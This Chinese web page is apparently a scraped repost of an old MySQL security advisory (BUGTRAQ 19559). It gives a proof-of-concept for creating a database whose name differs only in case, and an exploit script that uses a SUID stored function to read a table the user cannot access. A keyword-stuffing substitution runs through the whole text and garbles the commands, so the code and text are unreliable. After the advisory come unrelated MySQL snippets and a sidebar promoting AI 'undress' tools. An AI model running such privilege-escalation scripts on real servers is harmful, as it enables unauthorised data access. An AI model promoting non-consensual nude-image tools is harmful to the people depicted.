以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。 受影响系统: MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合
以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。
受影响系统:
MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合)
描述:
BUGTRAQ ID: 19559
MySQL(和PHP搭配之最佳组合)是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
在MySQL(和PHP搭配之最佳组合)上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL(和PHP搭配之最佳组合)的文件系统支持区分大小写的文件名。
此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。
测试方法:
【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】
1、创建数据库
<ol class="dp-xml"> <li class="alt"><span><span>$ MySQL(和PHP搭配之最佳组合) -h my.MySQL(和PHP搭配之最佳组合).server -u sample -p -A sample </span></span></li> <li><span>Enter password: </span></li> <li class="alt"><span>Welcome to the MySQL(和PHP搭配之最佳组合) monitor. Commands end with ; or \g. </span></li> <li><span>Your MySQL(和PHP搭配之最佳组合) connection id is 263935 to server version: 4.1.16-standard </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database another; </span> </li> <li><span>ERROR 1044: Access denied for user 'sample'@'%' to database 'another' </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database sAmple; </span> </li> <li><span>Query OK, 1 row affected (0.00 sec) </span></li> </ol>
2、权限提升
<ol class="dp-xml"> <li class="alt"><span><span>--disable_warnings </span></span></li> <li><span>drop database if exists MySQL(和PHP搭配之最佳组合)test1; </span></li> <li class="alt"><span>drop database if exists MySQL(和PHP搭配之最佳组合)test2; </span></li> <li><span>drop function if exists f_suid; </span></li> <li class="alt"><span>--enable_warnings </span></li> <li><span># Prepare playground </span></li> <li class="alt"><span>create database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>create database MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span>create user malory@localhost; </span></li> <li><span>grant all privileges on MySQL(和PHP搭配之最佳组合)test1.* to malory@localhost; </span></li> <li class="alt"><span># Create harmless (but SUID!) function </span></li> <li><span>create function f_suid(i int) returns int return 0; </span></li> <li class="alt"><span>grant execute on function test.f_suid to malory@localhost; </span></li> <li><span>use MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span># Create table in which malory@localhost will be interested but to which </span></li> <li><span># he won't have any access </span></li> <li class="alt"><span>create table t1 (i int); </span></li> <li><span>connect (malcon, localhost, malory,,MySQL(和PHP搭配之最佳组合)test1); </span></li> <li class="alt"><span># Correct malory@localhost don't have access to MySQL(和PHP搭配之最佳组合)test2.t1 </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select * from MySQL(和PHP搭配之最佳组合)test2.t1; </span></li> <li><span># Create function which will allow to exploit security hole </span></li> <li class="alt"><span>delimiter |; </span></li> <li><span>create function f_evil () </span></li> <li class="alt"><span>returns int </span></li> <li><span>sql security invoker </span></li> <li class="alt"><span>begin </span></li> <li> <span>set @</span><span class="attribute">a:</span><span>= </span><span class="attribute-value">current_user</span><span>(); </span> </li> <li class="alt"> <span>set @</span><span class="attribute">b:</span><span>= (select count(*) from MySQL(和PHP搭配之最佳组合)test2.t1); </span> </li> <li><span>return 0; </span></li> <li class="alt"><span>end| </span></li> <li><span>delimiter ;| </span></li> <li class="alt"><span># Again correct </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select f_evil(); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span># Oops!!! it seems that f_evil() is executed in the context of </span></li> <li><span># f_suid() definer, so malory@locahost gets all info that he wants </span></li> <li class="alt"><span>select test.f_suid(f_evil()); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span>connection default; </span></li> <li><span>drop user malory@localhost; </span></li> <li class="alt"><span>drop database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>drop database MySQL(和PHP搭配之最佳组合)test2; </span></li> </ol>
建议:
厂商补丁:MySQL(和PHP搭配之最佳组合) AB,目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载。
说明InnoDB重做日志和撤消日志的作用。Apr 15, 2025 am 12:16 AMInnoDB使用redologs和undologs确保数据一致性和可靠性。1.redologs记录数据页修改,确保崩溃恢复和事务持久性。2.undologs记录数据原始值,支持事务回滚和MVCC。
在解释输出(类型,键,行,额外)中要查找的关键指标是什么?Apr 15, 2025 am 12:15 AMEXPLAIN命令的关键指标包括type、key、rows和Extra。1)type反映查询的访问类型,值越高效率越高,如const优于ALL。2)key显示使用的索引,NULL表示无索引。3)rows预估扫描行数,影响查询性能。4)Extra提供额外信息,如Usingfilesort提示需要优化。
在解释中使用临时状态以及如何避免它是什么?Apr 15, 2025 am 12:14 AMUsingtemporary在MySQL查询中表示需要创建临时表,常见于使用DISTINCT、GROUPBY或非索引列的ORDERBY。可以通过优化索引和重写查询避免其出现,提升查询性能。具体来说,Usingtemporary出现在EXPLAIN输出中时,意味着MySQL需要创建临时表来处理查询。这通常发生在以下情况:1)使用DISTINCT或GROUPBY时进行去重或分组;2)ORDERBY包含非索引列时进行排序;3)使用复杂的子查询或联接操作。优化方法包括:1)为ORDERBY和GROUPB
描述不同的SQL交易隔离级别(读取未读取,读取,可重复的读取,可序列化)及其在MySQL/InnoDB中的含义。Apr 15, 2025 am 12:11 AMMySQL/InnoDB支持四种事务隔离级别:ReadUncommitted、ReadCommitted、RepeatableRead和Serializable。1.ReadUncommitted允许读取未提交数据,可能导致脏读。2.ReadCommitted避免脏读,但可能发生不可重复读。3.RepeatableRead是默认级别,避免脏读和不可重复读,但可能发生幻读。4.Serializable避免所有并发问题,但降低并发性。选择合适的隔离级别需平衡数据一致性和性能需求。
MySQL与其他数据库:比较选项Apr 15, 2025 am 12:08 AMMySQL适合Web应用和内容管理系统,因其开源、高性能和易用性而受欢迎。1)与PostgreSQL相比,MySQL在简单查询和高并发读操作上表现更好。2)相较Oracle,MySQL因开源和低成本更受中小企业青睐。3)对比MicrosoftSQLServer,MySQL更适合跨平台应用。4)与MongoDB不同,MySQL更适用于结构化数据和事务处理。
MySQL索引基数如何影响查询性能?Apr 14, 2025 am 12:18 AMMySQL索引基数对查询性能有显着影响:1.高基数索引能更有效地缩小数据范围,提高查询效率;2.低基数索引可能导致全表扫描,降低查询性能;3.在联合索引中,应将高基数列放在前面以优化查询。
MySQL:新用户的资源和教程Apr 14, 2025 am 12:16 AMMySQL学习路径包括基础知识、核心概念、使用示例和优化技巧。1)了解表、行、列、SQL查询等基础概念。2)学习MySQL的定义、工作原理和优势。3)掌握基本CRUD操作和高级用法,如索引和存储过程。4)熟悉常见错误调试和性能优化建议,如合理使用索引和优化查询。通过这些步骤,你将全面掌握MySQL的使用和优化。
现实世界Mysql:示例和用例Apr 14, 2025 am 12:15 AMMySQL在现实世界的应用包括基础数据库设计和复杂查询优化。1)基本用法:用于存储和管理用户数据,如插入、查询、更新和删除用户信息。2)高级用法:处理复杂业务逻辑,如电子商务平台的订单和库存管理。3)性能优化:通过合理使用索引、分区表和查询缓存来提升性能。
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
AI Hentai Generator
免费生成ai无尽的。
热门文章
热工具
MinGW - 适用于 Windows 的极简 GNU
这个项目正在迁移到osdn.net/projects/mingw的过程中,你可以继续在那里关注我们。MinGW:GNU编译器集合(GCC)的本地Windows移植版本,可自由分发的导入库和用于构建本地Windows应用程序的头文件;包括对MSVC运行时的扩展,以支持C99功能。MinGW的所有软件都可以在64位Windows平台上运行。
mPDF
mPDF是一个PHP库,可以从UTF-8编码的HTML生成PDF文件。原作者Ian Back编写mPDF以从他的网站上“即时”输出PDF文件,并处理不同的语言。与原始脚本如HTML2FPDF相比,它的速度较慢,并且在使用Unicode字体时生成的文件较大,但支持CSS样式等,并进行了大量增强。支持几乎所有语言,包括RTL(阿拉伯语和希伯来语)和CJK(中日韩)。支持嵌套的块级元素(如P、DIV),
安全考试浏览器
Safe Exam Browser是一个安全的浏览器环境,用于安全地进行在线考试。该软件将任何计算机变成一个安全的工作站。它控制对任何实用工具的访问,并防止学生使用未经授权的资源。
SublimeText3 英文版
推荐:为Win版本,支持代码提示!
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
